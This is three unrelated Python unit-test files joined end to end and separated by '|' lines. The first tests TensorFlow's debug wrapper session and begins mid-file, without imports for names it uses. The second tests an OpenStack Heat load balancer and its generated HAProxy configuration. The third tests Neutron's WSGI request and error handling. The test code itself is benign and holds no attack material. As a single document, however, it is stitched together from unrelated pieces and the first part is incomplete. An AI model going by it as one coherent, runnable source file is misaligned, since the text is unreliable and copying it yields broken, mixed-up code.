from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
class TestDebugWrapperSession(framework.BaseDebugWrapperSession):
"""A concrete implementation of BaseDebugWrapperSession for test."""
def __init__(self, sess, dump_root, observer, thread_name_filter=None):
# Supply dump root.
self._dump_root = dump_root
# Supply observer.
self._obs = observer
# Invoke superclass constructor.
framework.BaseDebugWrapperSession.__init__(
self, sess, thread_name_filter=thread_name_filter)
def on_session_init(self, request):
"""Override abstract on-session-init callback method."""
self._obs["sess_init_count"] += 1
self._obs["request_sess"] = request.session
return framework.OnSessionInitResponse(
framework.OnSessionInitAction.PROCEED)
def on_run_start(self, request):
"""Override abstract on-run-start callback method."""
self._obs["on_run_start_count"] += 1
self._obs["run_fetches"] = request.fetches
self._obs["run_feed_dict"] = request.feed_dict
return framework.OnRunStartResponse(
framework.OnRunStartAction.DEBUG_RUN,
["file://" + self._dump_root])
def on_run_end(self, request):
"""Override abstract on-run-end callback method."""
self._obs["on_run_end_count"] += 1
self._obs["performed_action"] = request.performed_action
self._obs["tf_error"] = request.tf_error
return framework.OnRunEndResponse()
class TestDebugWrapperSessionBadAction(framework.BaseDebugWrapperSession):
"""A concrete implementation of BaseDebugWrapperSession for test.
This class intentionally puts a bad action value in OnSessionInitResponse
and/or in OnRunStartAction to test the handling of such invalid cases.
"""
def __init__(
self,
sess,
bad_init_action=None,
bad_run_start_action=None,
bad_debug_urls=None):
"""Constructor.
Args:
sess: The TensorFlow Session object to be wrapped.
bad_init_action: (str) bad action value to be returned during the
on-session-init callback.
bad_run_start_action: (str) bad action value to be returned during the
the on-run-start callback.
bad_debug_urls: Bad URL values to be returned during the on-run-start
callback.
"""
self._bad_init_action = bad_init_action
self._bad_run_start_action = bad_run_start_action
self._bad_debug_urls = bad_debug_urls
# Invoke superclass constructor.
framework.BaseDebugWrapperSession.__init__(self, sess)
def on_session_init(self, request):
if self._bad_init_action:
return framework.OnSessionInitResponse(self._bad_init_action)
else:
return framework.OnSessionInitResponse(
framework.OnSessionInitAction.PROCEED)
def on_run_start(self, request):
debug_urls = self._bad_debug_urls or []
if self._bad_run_start_action:
return framework.OnRunStartResponse(
self._bad_run_start_action, debug_urls)
else:
return framework.OnRunStartResponse(
framework.OnRunStartAction.DEBUG_RUN, debug_urls)
def on_run_end(self, request):
return framework.OnRunEndResponse()
class DebugWrapperSessionTest(test_util.TensorFlowTestCase):
def setUp(self):
self._observer = {
"sess_init_count": 0,
"request_sess": None,
"on_run_start_count": 0,
"run_fetches": None,
"run_feed_dict": None,
"on_run_end_count": 0,
"performed_action": None,
"tf_error": None,
}
self._dump_root = tempfile.mkdtemp()
self._sess = session.Session()
self._a_init_val = np.array([[5.0, 3.0], [-1.0, 0.0]])
self._b_init_val = np.array([[2.0], [-1.0]])
self._c_val = np.array([[-4.0], [6.0]])
self._a_init = constant_op.constant(
self._a_init_val, shape=[2, 2], name="a_init")
self._b_init = constant_op.constant(
self._b_init_val, shape=[2, 1], name="b_init")
self._ph = array_ops.placeholder(dtype=dtypes.float64, name="ph")
self._a = variables.Variable(self._a_init, name="a1")
self._b = variables.Variable(self._b_init, name="b")
self._c = constant_op.constant(self._c_val, shape=[2, 1], name="c")
# Matrix product of a and b.
self._p = math_ops.matmul(self._a, self._b, name="p1")
# Matrix product of a and ph.
self._q = math_ops.matmul(self._a, self._ph, name="q")
# Sum of two vectors.
self._s = math_ops.add(self._p, self._c, name="s")
# Initialize the variables.
self._sess.run(self._a.initializer)
self._sess.run(self._b.initializer)
def tearDown(self):
# Tear down temporary dump directory.
if os.path.isdir(self._dump_root):
shutil.rmtree(self._dump_root)
ops.reset_default_graph()
def testSessionInit(self):
self.assertEqual(0, self._observer["sess_init_count"])
wrapper_sess = TestDebugWrapperSession(self._sess, self._dump_root,
self._observer)
# Assert that on-session-init callback is invoked.
self.assertEqual(1, self._observer["sess_init_count"])
# Assert that the request to the on-session-init callback carries the
# correct session object.
self.assertEqual(self._sess, self._observer["request_sess"])
# Verify that the wrapper session implements the session.SessionInterface.
self.assertTrue(isinstance(wrapper_sess, session.SessionInterface))
self.assertEqual(self._sess.sess_str, wrapper_sess.sess_str)
self.assertEqual(self._sess.graph, wrapper_sess.graph)
self.assertEqual(self._sess.graph_def, wrapper_sess.graph_def)
# Check that the partial_run_setup and partial_run are not implemented for
# the debug wrapper session.
with self.assertRaises(NotImplementedError):
wrapper_sess.partial_run_setup(self._p)
def testInteractiveSessionInit(self):
"""The wrapper should work also on other subclassses of session.Session."""
TestDebugWrapperSession(
session.InteractiveSession(), self._dump_root, self._observer)
def testSessionRun(self):
wrapper = TestDebugWrapperSession(
self._sess, self._dump_root, self._observer)
# Check initial state of the observer.
self.assertEqual(0, self._observer["on_run_start_count"])
self.assertEqual(0, self._observer["on_run_end_count"])
s = wrapper.run(self._s)
# Assert the run return value is correct.
self.assertAllClose(np.array([[3.0], [4.0]]), s)
# Assert the on-run-start method is invoked.
self.assertEqual(1, self._observer["on_run_start_count"])
# Assert the on-run-start request reflects the correct fetch.
self.assertEqual(self._s, self._observer["run_fetches"])
# Assert the on-run-start request reflects the correct feed_dict.
self.assertIsNone(self._observer["run_feed_dict"])
# Assert the file debug URL has led to dump on the filesystem.
dump = debug_data.DebugDumpDir(self._dump_root)
self.assertEqual(7, len(dump.dumped_tensor_data))
# Assert the on-run-end method is invoked.
self.assertEqual(1, self._observer["on_run_end_count"])
# Assert the performed action field in the on-run-end callback request is
# correct.
self.assertEqual(
framework.OnRunStartAction.DEBUG_RUN,
self._observer["performed_action"])
# No TensorFlow runtime error should have happened.
self.assertIsNone(self._observer["tf_error"])
def testSessionInitInvalidSessionType(self):
"""Attempt to wrap a non-Session-type object should cause an exception."""
wrapper = TestDebugWrapperSessionBadAction(self._sess)
with self.assertRaisesRegexp(TypeError, "Expected type .*; got type .*"):
TestDebugWrapperSessionBadAction(wrapper)
def testSessionInitBadActionValue(self):
with self.assertRaisesRegexp(
ValueError, "Invalid OnSessionInitAction value: nonsense_action"):
TestDebugWrapperSessionBadAction(
self._sess, bad_init_action="nonsense_action")
def testRunStartBadActionValue(self):
wrapper = TestDebugWrapperSessionBadAction(
self._sess, bad_run_start_action="nonsense_action")
with self.assertRaisesRegexp(
ValueError, "Invalid OnRunStartAction value: nonsense_action"):
wrapper.run(self._s)
def testRunStartBadURLs(self):
# debug_urls ought to be a list of str, not a str. So an exception should
# be raised during a run() call.
wrapper = TestDebugWrapperSessionBadAction(
self._sess, bad_debug_urls="file://foo")
with self.assertRaisesRegexp(TypeError, "Expected type .*; got type .*"):
wrapper.run(self._s)
def testErrorDuringRun(self):
wrapper = TestDebugWrapperSession(self._sess, self._dump_root,
self._observer)
# No matrix size mismatch.
self.assertAllClose(
np.array([[11.0], [-1.0]]),
wrapper.run(self._q, feed_dict={self._ph: np.array([[1.0], [2.0]])}))
self.assertEqual(1, self._observer["on_run_end_count"])
self.assertIsNone(self._observer["tf_error"])
# Now there should be a matrix size mismatch error.
wrapper.run(self._q, feed_dict={self._ph: np.array([[1.0], [2.0], [3.0]])})
self.assertEqual(2, self._observer["on_run_end_count"])
self.assertTrue(
isinstance(self._observer["tf_error"], errors.InvalidArgumentError))
def testUsingWrappedSessionShouldWorkAsContextManager(self):
wrapper = TestDebugWrapperSession(self._sess, self._dump_root,
self._observer)
with wrapper as sess:
sess.run(self._s)
def testUsingWrappedSessionShouldSupportEvalWithAsDefault(self):
wrapper = TestDebugWrapperSession(self._sess, self._dump_root,
self._observer)
with wrapper.as_default():
foo = constant_op.constant(42, name="foo")
self.assertEqual(42, foo.eval())
self.assertEqual(foo, self._observer["run_fetches"])
def testWrapperShouldSupportSessionClose(self):
wrapper = TestDebugWrapperSession(self._sess, self._dump_root,
self._observer)
wrapper.close()
def testWrapperThreadNameFilterMainThread(self):
wrapper = TestDebugWrapperSession(
self._sess, self._dump_root, self._observer,
thread_name_filter="MainThread")
child_run_output = []
def child_thread_job():
child_run_output.append(wrapper.run(self._b_init))
thread = threading.Thread(name="ChildThread", target=child_thread_job)
thread.start()
self.assertAllClose(self._a_init_val, wrapper.run(self._a_init))
thread.join()
self.assertAllClose([self._b_init_val], child_run_output)
dump = debug_data.DebugDumpDir(self._dump_root)
self.assertEqual(1, dump.size)
self.assertEqual("a_init", dump.dumped_tensor_data[0].node_name)
def testWrapperThreadNameFilterChildThread(self):
wrapper = TestDebugWrapperSession(
self._sess, self._dump_root, self._observer,
thread_name_filter=r"Child.*")
child_run_output = []
def child_thread_job():
child_run_output.append(wrapper.run(self._b_init))
thread = threading.Thread(name="ChildThread", target=child_thread_job)
thread.start()
self.assertAllClose(self._a_init_val, wrapper.run(self._a_init))
thread.join()
self.assertAllClose([self._b_init_val], child_run_output)
dump = debug_data.DebugDumpDir(self._dump_root)
self.assertEqual(1, dump.size)
self.assertEqual("b_init", dump.dumped_tensor_data[0].node_name)
def testWrapperThreadNameFilterBothThreads(self):
wrapper = TestDebugWrapperSession(
self._sess, self._dump_root, self._observer,
thread_name_filter=None)
child_run_output = []
def child_thread_job():
child_run_output.append(wrapper.run(self._b_init))
thread = threading.Thread(name="ChildThread", target=child_thread_job)
thread.start()
self.assertAllClose(self._a_init_val, wrapper.run(self._a_init))
thread.join()
self.assertAllClose([self._b_init_val], child_run_output)
dump = debug_data.DebugDumpDir(self._dump_root, validate=False)
self.assertEqual(2, dump.size)
self.assertItemsEqual(
["a_init", "b_init"],
[datum.node_name for datum in dump.dumped_tensor_data])
def testUsingNonDirectSessionRaisesNotImplementedError(self):
# TODO(cais): Remove this test once tfdbg is integrated with GrpcSession.
fake_non_direct_session = session.Session()
fake_non_direct_session._target = "foo"
with self.assertRaisesRegexp(
NotImplementedError,
r"Non-DirectSession support is not available from TensorFlow Debugger "
r"yet \(sess_str=foo\)"):
TestDebugWrapperSession(
fake_non_direct_session, self._dump_root, self._observer)
if __name__ == "__main__":
googletest.main()
|
|
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import mock
from oslo_config import cfg
from heat.common import exception
from heat.common import template_format
from heat.engine.clients.os import nova
from heat.engine.resources.aws.lb import loadbalancer as lb
from heat.engine import rsrc_defn
from heat.tests import common
from heat.tests.openstack.nova import fakes as fakes_nova
from heat.tests import utils
lb_template = '''
{
"AWSTemplateFormatVersion": "2010-09-09",
"Description": "LB Template",
"Parameters" : {
"KeyName" : {
"Description" : "KeyName",
"Type" : "String",
"Default" : "test"
},
"LbFlavor" : {
"Description" : "Flavor to use for LoadBalancer instance",
"Type": "String",
"Default": "m1.heat"
},
"LbImageId" : {
"Description" : "Image to use",
"Type" : "String",
"Default" : "image123"
}
},
"Resources": {
"WikiServerOne": {
"Type": "AWS::EC2::Instance",
"Properties": {
"ImageId": "F17-x86_64-gold",
"InstanceType" : "m1.large",
"KeyName" : "test",
"UserData" : "some data"
}
},
"LoadBalancer" : {
"Type" : "AWS::ElasticLoadBalancing::LoadBalancer",
"Properties" : {
"AvailabilityZones" : ["nova"],
"SecurityGroups": ["sg_1"],
"Instances" : [{"Ref": "WikiServerOne"}],
"Listeners" : [ {
"LoadBalancerPort" : "80",
"InstancePort" : "80",
"Protocol" : "HTTP"
}]
}
}
}
}
'''
class LoadBalancerTest(common.HeatTestCase):
def setUp(self):
super(LoadBalancerTest, self).setUp()
self.fc = fakes_nova.FakeClient()
def test_loadbalancer(self):
t = template_format.parse(lb_template)
s = utils.parse_stack(t)
s.store()
resource_name = 'LoadBalancer'
lb_defn = s.t.resource_definitions(s)[resource_name]
rsrc = lb.LoadBalancer(resource_name, lb_defn, s)
self.patchobject(nova.NovaClientPlugin, '_create',
return_value=self.fc)
initial_md = {'AWS::CloudFormation::Init':
{'config':
{'files':
{'/etc/haproxy/haproxy.cfg': {'content': 'initial'}}}}}
ha_cfg = '\n'.join(['\nglobal', ' daemon', ' maxconn 256',
' stats socket /tmp/.haproxy-stats',
'\ndefaults',
' mode http\n timeout connect 5000ms',
' timeout client 50000ms',
' timeout server 50000ms\n\nfrontend http',
' bind *:80\n default_backend servers',
'\nbackend servers\n balance roundrobin',
' option http-server-close',
' option forwardfor\n option httpchk',
'\n server server1 1.2.3.4:80',
' server server2 0.0.0.0:80\n'])
expected_md = {'AWS::CloudFormation::Init':
{'config':
{'files':
{'/etc/haproxy/haproxy.cfg': {
'content': ha_cfg}}}}}
md = mock.Mock()
md.metadata_get.return_value = copy.deepcopy(initial_md)
rsrc.nested = mock.Mock(return_value={'LB_instance': md})
prop_diff = {'Instances': ['WikiServerOne1', 'WikiServerOne2']}
props = copy.copy(rsrc.properties.data)
props.update(prop_diff)
update_defn = rsrc_defn.ResourceDefinition(rsrc.name, rsrc.type(),
props)
rsrc.handle_update(update_defn, {}, prop_diff)
self.assertIsNone(rsrc.handle_update(rsrc.t, {}, {}))
md.metadata_get.assert_called_once_with()
md.metadata_set.assert_called_once_with(expected_md)
def test_loadbalancer_validate_hchk_good(self):
hc = {
'Target': 'HTTP:80/',
'HealthyThreshold': '3',
'UnhealthyThreshold': '5',
'Interval': '30',
'Timeout': '5'}
rsrc = self.setup_loadbalancer(hc=hc)
rsrc._parse_nested_stack = mock.Mock()
self.assertIsNone(rsrc.validate())
def test_loadbalancer_validate_hchk_int_gt_tmo(self):
hc = {
'Target': 'HTTP:80/',
'HealthyThreshold': '3',
'UnhealthyThreshold': '5',
'Interval': '30',
'Timeout': '35'}
rsrc = self.setup_loadbalancer(hc=hc)
rsrc._parse_nested_stack = mock.Mock()
self.assertEqual(
{'Error': 'Interval must be larger than Timeout'},
rsrc.validate())
def test_loadbalancer_validate_badtemplate(self):
cfg.CONF.set_override('loadbalancer_template', '/a/noexist/x.y',
enforce_type=True)
rsrc = self.setup_loadbalancer()
self.assertRaises(exception.StackValidationFailed, rsrc.validate)
def setup_loadbalancer(self, include_magic=True, cache_data=None, hc=None):
template = template_format.parse(lb_template)
if not include_magic:
del template['Parameters']['KeyName']
del template['Parameters']['LbFlavor']
del template['Parameters']['LbImageId']
if hc is not None:
props = template['Resources']['LoadBalancer']['Properties']
props['HealthCheck'] = hc
self.stack = utils.parse_stack(template, cache_data=cache_data)
resource_name = 'LoadBalancer'
lb_defn = self.stack.t.resource_definitions(self.stack)[resource_name]
return lb.LoadBalancer(resource_name, lb_defn, self.stack)
def test_loadbalancer_refid(self):
rsrc = self.setup_loadbalancer()
self.assertEqual('LoadBalancer', rsrc.FnGetRefId())
def test_loadbalancer_refid_convergence_cache_data(self):
cache_data = {'LoadBalancer': {
'uuid': mock.ANY,
'id': mock.ANY,
'action': 'CREATE',
'status': 'COMPLETE',
'reference_id': 'LoadBalancer_convg_mock'
}}
rsrc = self.setup_loadbalancer(cache_data=cache_data)
self.assertEqual('LoadBalancer_convg_mock', rsrc.FnGetRefId())
def test_loadbalancer_attr_dnsname(self):
rsrc = self.setup_loadbalancer()
rsrc.get_output = mock.Mock(return_value='1.3.5.7')
self.assertEqual('1.3.5.7', rsrc.FnGetAtt('DNSName'))
rsrc.get_output.assert_called_once_with('PublicIp')
def test_loadbalancer_attr_not_supported(self):
rsrc = self.setup_loadbalancer()
for attr in ['CanonicalHostedZoneName',
'CanonicalHostedZoneNameID',
'SourceSecurityGroup.GroupName',
'SourceSecurityGroup.OwnerAlias']:
self.assertEqual('', rsrc.FnGetAtt(attr))
def test_loadbalancer_attr_invalid(self):
rsrc = self.setup_loadbalancer()
self.assertRaises(exception.InvalidTemplateAttribute,
rsrc.FnGetAtt, 'Foo')
def test_child_params_without_key_name(self):
rsrc = self.setup_loadbalancer(False)
self.assertNotIn('KeyName', rsrc.child_params())
def test_child_params_with_key_name(self):
rsrc = self.setup_loadbalancer()
params = rsrc.child_params()
self.assertEqual('test', params['KeyName'])
def test_child_template_without_key_name(self):
rsrc = self.setup_loadbalancer(False)
parsed_template = {
'Resources': {'LB_instance': {'Properties': {'KeyName': 'foo'}}},
'Parameters': {'KeyName': 'foo'}
}
rsrc.get_parsed_template = mock.Mock(return_value=parsed_template)
tmpl = rsrc.child_template()
self.assertNotIn('KeyName', tmpl['Parameters'])
self.assertNotIn('KeyName',
tmpl['Resources']['LB_instance']['Properties'])
def test_child_template_with_key_name(self):
rsrc = self.setup_loadbalancer()
rsrc.get_parsed_template = mock.Mock(return_value='foo')
self.assertEqual('foo', rsrc.child_template())
def test_child_params_with_flavor(self):
rsrc = self.setup_loadbalancer()
params = rsrc.child_params()
self.assertEqual('m1.heat', params['LbFlavor'])
def test_child_params_without_flavor(self):
rsrc = self.setup_loadbalancer(False)
params = rsrc.child_params()
self.assertNotIn('LbFlavor', params)
def test_child_params_with_image_id(self):
rsrc = self.setup_loadbalancer()
params = rsrc.child_params()
self.assertEqual('image123', params['LbImageId'])
def test_child_params_without_image_id(self):
rsrc = self.setup_loadbalancer(False)
params = rsrc.child_params()
self.assertNotIn('LbImageId', params)
def test_child_params_with_sec_gr(self):
rsrc = self.setup_loadbalancer(False)
params = rsrc.child_params()
expected = {'SecurityGroups': ['sg_1']}
self.assertEqual(expected, params)
def test_child_params_default_sec_gr(self):
template = template_format.parse(lb_template)
del template['Parameters']['KeyName']
del template['Parameters']['LbFlavor']
del template['Resources']['LoadBalancer']['Properties'][
'SecurityGroups']
del template['Parameters']['LbImageId']
stack = utils.parse_stack(template)
resource_name = 'LoadBalancer'
lb_defn = stack.t.resource_definitions(stack)[resource_name]
rsrc = lb.LoadBalancer(resource_name, lb_defn, stack)
params = rsrc.child_params()
# None value means, that will be used default [] for parameter
expected = {'SecurityGroups': None}
self.assertEqual(expected, params)
class HaProxyConfigTest(common.HeatTestCase):
def setUp(self):
super(HaProxyConfigTest, self).setUp()
self.stack = utils.parse_stack(template_format.parse(lb_template))
resource_name = 'LoadBalancer'
lb_defn = self.stack.t.resource_definitions(self.stack)[resource_name]
self.lb = lb.LoadBalancer(resource_name, lb_defn, self.stack)
self.lb.client_plugin = mock.Mock()
def _mock_props(self, props):
def get_props(name):
return props[name]
self.lb.properties = mock.MagicMock()
self.lb.properties.__getitem__.side_effect = get_props
def test_combined(self):
self.lb._haproxy_config_global = mock.Mock(return_value='one,')
self.lb._haproxy_config_frontend = mock.Mock(return_value='two,')
self.lb._haproxy_config_backend = mock.Mock(return_value='three,')
self.lb._haproxy_config_servers = mock.Mock(return_value='four')
actual = self.lb._haproxy_config([3, 5])
self.assertEqual('one,two,three,four\n', actual)
self.lb._haproxy_config_global.assert_called_once_with()
self.lb._haproxy_config_frontend.assert_called_once_with()
self.lb._haproxy_config_backend.assert_called_once_with()
self.lb._haproxy_config_servers.assert_called_once_with([3, 5])
def test_global(self):
exp = '''
global
daemon
maxconn 256
stats socket /tmp/.haproxy-stats
defaults
mode http
timeout connect 5000ms
timeout client 50000ms
timeout server 50000ms
'''
actual = self.lb._haproxy_config_global()
self.assertEqual(exp, actual)
def test_frontend(self):
props = {'HealthCheck': {},
'Listeners': [{'LoadBalancerPort': 4014}]}
self._mock_props(props)
exp = '''
frontend http
bind *:4014
default_backend servers
'''
actual = self.lb._haproxy_config_frontend()
self.assertEqual(exp, actual)
def test_backend_with_timeout(self):
props = {'HealthCheck': {'Timeout': 43}}
self._mock_props(props)
actual = self.lb._haproxy_config_backend()
exp = '''
backend servers
balance roundrobin
option http-server-close
option forwardfor
option httpchk
timeout check 43s
'''
self.assertEqual(exp, actual)
def test_backend_no_timeout(self):
self._mock_props({'HealthCheck': None})
be = self.lb._haproxy_config_backend()
exp = '''
backend servers
balance roundrobin
option http-server-close
option forwardfor
option httpchk
'''
self.assertEqual(exp, be)
def test_servers_none(self):
props = {'HealthCheck': {},
'Listeners': [{'InstancePort': 1234}]}
self._mock_props(props)
actual = self.lb._haproxy_config_servers([])
exp = ''
self.assertEqual(exp, actual)
def test_servers_no_check(self):
props = {'HealthCheck': {},
'Listeners': [{'InstancePort': 4511}]}
self._mock_props(props)
def fake_to_ipaddr(inst):
return '192.168.1.%s' % inst
to_ip = self.lb.client_plugin.return_value.server_to_ipaddress
to_ip.side_effect = fake_to_ipaddr
actual = self.lb._haproxy_config_servers(range(1, 3))
exp = '''
server server1 192.168.1.1:4511
server server2 192.168.1.2:4511'''
self.assertEqual(exp.replace('\n', '', 1), actual)
def test_servers_servers_and_check(self):
props = {'HealthCheck': {'HealthyThreshold': 1,
'Interval': 2,
'Target': 'HTTP:80/',
'Timeout': 45,
'UnhealthyThreshold': 5
},
'Listeners': [{'InstancePort': 1234}]}
self._mock_props(props)
def fake_to_ipaddr(inst):
return '192.168.1.%s' % inst
to_ip = self.lb.client_plugin.return_value.server_to_ipaddress
to_ip.side_effect = fake_to_ipaddr
actual = self.lb._haproxy_config_servers(range(1, 3))
exp = '''
server server1 192.168.1.1:1234 check inter 2s fall 5 rise 1
server server2 192.168.1.2:1234 check inter 2s fall 5 rise 1'''
self.assertEqual(exp.replace('\n', '', 1), actual)
|
|
# Copyright (c) 2012 Intel Corporation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
import oslo_i18n
from webob import exc
import webtest
from neutron._i18n import _
from neutron.api.v2 import resource as wsgi_resource
from neutron.common import exceptions as n_exc
from neutron import context
from neutron.tests import base
from neutron import wsgi
class RequestTestCase(base.BaseTestCase):
def setUp(self):
super(RequestTestCase, self).setUp()
self.req = wsgi_resource.Request({'foo': 'bar'})
def test_content_type_missing(self):
request = wsgi.Request.blank('/tests/123', method='POST')
request.body = b"<body />"
self.assertIsNone(request.get_content_type())
def test_content_type_with_charset(self):
request = wsgi.Request.blank('/tests/123')
request.headers["Content-Type"] = "application/json; charset=UTF-8"
result = request.get_content_type()
self.assertEqual("application/json", result)
def test_content_type_from_accept(self):
content_type = 'application/json'
request = wsgi.Request.blank('/tests/123')
request.headers["Accept"] = content_type
result = request.best_match_content_type()
self.assertEqual(content_type, result)
def test_content_type_from_accept_best(self):
request = wsgi.Request.blank('/tests/123')
request.headers["Accept"] = "application/json"
result = request.best_match_content_type()
self.assertEqual("application/json", result)
request = wsgi.Request.blank('/tests/123')
request.headers["Accept"] = ("application/json; q=0.3, "
"application/xml; q=0.9")
result = request.best_match_content_type()
self.assertEqual("application/json", result)
def test_content_type_from_query_extension(self):
request = wsgi.Request.blank('/tests/123.json')
result = request.best_match_content_type()
self.assertEqual("application/json", result)
request = wsgi.Request.blank('/tests/123.invalid')
result = request.best_match_content_type()
self.assertEqual("application/json", result)
def test_content_type_accept_and_query_extension(self):
request = wsgi.Request.blank('/tests/123.json')
request.headers["Accept"] = "application/xml"
result = request.best_match_content_type()
self.assertEqual("application/json", result)
def test_content_type_accept_default(self):
request = wsgi.Request.blank('/tests/123.unsupported')
request.headers["Accept"] = "application/unsupported1"
result = request.best_match_content_type()
self.assertEqual("application/json", result)
def test_context_with_neutron_context(self):
ctxt = context.Context('fake_user', 'fake_tenant')
self.req.environ['neutron.context'] = ctxt
self.assertEqual(self.req.context, ctxt)
def test_context_without_neutron_context(self):
self.assertTrue(self.req.context.is_admin)
def test_request_context_elevated(self):
user_context = context.Context(
'fake_user', 'fake_project', admin=False)
self.assertFalse(user_context.is_admin)
admin_context = user_context.elevated()
self.assertFalse(user_context.is_admin)
self.assertTrue(admin_context.is_admin)
self.assertNotIn('admin', user_context.roles)
self.assertIn('admin', admin_context.roles)
def test_best_match_language(self):
# Test that we are actually invoking language negotiation by webop
request = wsgi.Request.blank('/')
oslo_i18n.get_available_languages = mock.MagicMock()
oslo_i18n.get_available_languages.return_value = ['known-language',
'es', 'zh']
request.headers['Accept-Language'] = 'known-language'
language = request.best_match_language()
self.assertEqual('known-language', language)
# If the Accept-Leader is an unknown language, missing or empty,
# the best match locale should be None
request.headers['Accept-Language'] = 'unknown-language'
language = request.best_match_language()
self.assertIsNone(language)
request.headers['Accept-Language'] = ''
language = request.best_match_language()
self.assertIsNone(language)
request.headers.pop('Accept-Language')
language = request.best_match_language()
self.assertIsNone(language)
class ResourceTestCase(base.BaseTestCase):
@staticmethod
def _get_deserializer():
return wsgi.JSONDeserializer()
def test_unmapped_neutron_error_with_json(self):
msg = u'\u7f51\u7edc'
class TestException(n_exc.NeutronException):
message = msg
expected_res = {'body': {
'NeutronError': {
'type': 'TestException',
'message': msg,
'detail': ''}}}
controller = mock.MagicMock()
controller.test.side_effect = TestException()
resource = webtest.TestApp(wsgi_resource.Resource(controller))
environ = {'wsgiorg.routing_args': (None, {'action': 'test',
'format': 'json'})}
res = resource.get('', extra_environ=environ, expect_errors=True)
self.assertEqual(exc.HTTPInternalServerError.code, res.status_int)
self.assertEqual(expected_res,
wsgi.JSONDeserializer().deserialize(res.body))
@mock.patch('oslo_i18n.translate')
def test_unmapped_neutron_error_localized(self, mock_translation):
msg_translation = 'Translated error'
mock_translation.return_value = msg_translation
msg = _('Unmapped error')
class TestException(n_exc.NeutronException):
message = msg
controller = mock.MagicMock()
controller.test.side_effect = TestException()
resource = webtest.TestApp(wsgi_resource.Resource(controller))
environ = {'wsgiorg.routing_args': (None, {'action': 'test',
'format': 'json'})}
res = resource.get('', extra_environ=environ, expect_errors=True)
self.assertEqual(exc.HTTPInternalServerError.code, res.status_int)
self.assertIn(msg_translation,
str(wsgi.JSONDeserializer().deserialize(res.body)))
def test_mapped_neutron_error_with_json(self):
msg = u'\u7f51\u7edc'
class TestException(n_exc.NeutronException):
message = msg
expected_res = {'body': {
'NeutronError': {
'type': 'TestException',
'message': msg,
'detail': ''}}}
controller = mock.MagicMock()
controller.test.side_effect = TestException()
faults = {TestException: exc.HTTPGatewayTimeout}
resource = webtest.TestApp(wsgi_resource.Resource(controller,
faults=faults))
environ = {'wsgiorg.routing_args': (None, {'action': 'test',
'format': 'json'})}
res = resource.get('', extra_environ=environ, expect_errors=True)
self.assertEqual(exc.HTTPGatewayTimeout.code, res.status_int)
self.assertEqual(expected_res,
wsgi.JSONDeserializer().deserialize(res.body))
@mock.patch('oslo_i18n.translate')
def test_mapped_neutron_error_localized(self, mock_translation):
msg_translation = 'Translated error'
mock_translation.return_value = msg_translation
msg = _('Unmapped error')
class TestException(n_exc.NeutronException):
message = msg
controller = mock.MagicMock()
controller.test.side_effect = TestException()
faults = {TestException: exc.HTTPGatewayTimeout}
resource = webtest.TestApp(wsgi_resource.Resource(controller,
faults=faults))
environ = {'wsgiorg.routing_args': (None, {'action': 'test',
'format': 'json'})}
res = resource.get('', extra_environ=environ, expect_errors=True)
self.assertEqual(exc.HTTPGatewayTimeout.code, res.status_int)
self.assertIn(msg_translation,
str(wsgi.JSONDeserializer().deserialize(res.body)))
@staticmethod
def _make_request_with_side_effect(side_effect):
controller = mock.MagicMock()
controller.test.side_effect = side_effect
resource = webtest.TestApp(wsgi_resource.Resource(controller))
routing_args = {'action': 'test'}
environ = {'wsgiorg.routing_args': (None, routing_args)}
res = resource.get('', extra_environ=environ, expect_errors=True)
return res
def test_http_error(self):
res = self._make_request_with_side_effect(exc.HTTPGatewayTimeout())
# verify that the exception structure is the one expected
# by the python-neutronclient
self.assertEqual(exc.HTTPGatewayTimeout().explanation,
res.json['NeutronError']['message'])
self.assertEqual('HTTPGatewayTimeout',
res.json['NeutronError']['type'])
self.assertEqual('', res.json['NeutronError']['detail'])
self.assertEqual(exc.HTTPGatewayTimeout.code, res.status_int)
def test_unhandled_error(self):
expected_res = {'body': {'NeutronError':
{'detail': '',
'message': _(
'Request Failed: internal server '
'error while processing your request.'),
'type': 'HTTPInternalServerError'}}}
res = self._make_request_with_side_effect(side_effect=Exception())
self.assertEqual(exc.HTTPInternalServerError.code,
res.status_int)
self.assertEqual(expected_res,
self._get_deserializer().deserialize(res.body))
def test_not_implemented_error(self):
expected_res = {'body': {'NeutronError':
{'detail': '',
'message': _(
'The server has either erred or is '
'incapable of performing the requested '
'operation.'),
'type': 'HTTPNotImplemented'}}}
res = self._make_request_with_side_effect(exc.HTTPNotImplemented())
self.assertEqual(exc.HTTPNotImplemented.code, res.status_int)
self.assertEqual(expected_res,
self._get_deserializer().deserialize(res.body))
def test_status_200(self):
controller = mock.MagicMock()
controller.test = lambda request: {'foo': 'bar'}
resource = webtest.TestApp(wsgi_resource.Resource(controller))
environ = {'wsgiorg.routing_args': (None, {'action': 'test'})}
res = resource.get('', extra_environ=environ)
self.assertEqual(200, res.status_int)
def test_status_204(self):
controller = mock.MagicMock()
controller.test = lambda request: {'foo': 'bar'}
resource = webtest.TestApp(wsgi_resource.Resource(controller))
environ = {'wsgiorg.routing_args': (None, {'action': 'delete'})}
res = resource.delete('', extra_environ=environ)
self.assertEqual(204, res.status_int)
def test_action_status(self):
controller = mock.MagicMock()
controller.test = lambda request: {'foo': 'bar'}
action_status = {'test_200': 200, 'test_201': 201, 'test_204': 204}
resource = webtest.TestApp(
wsgi_resource.Resource(controller,
action_status=action_status))
for action in action_status:
environ = {'wsgiorg.routing_args': (None, {'action': action})}
res = resource.get('', extra_environ=environ)
self.assertEqual(action_status[action], res.status_int)
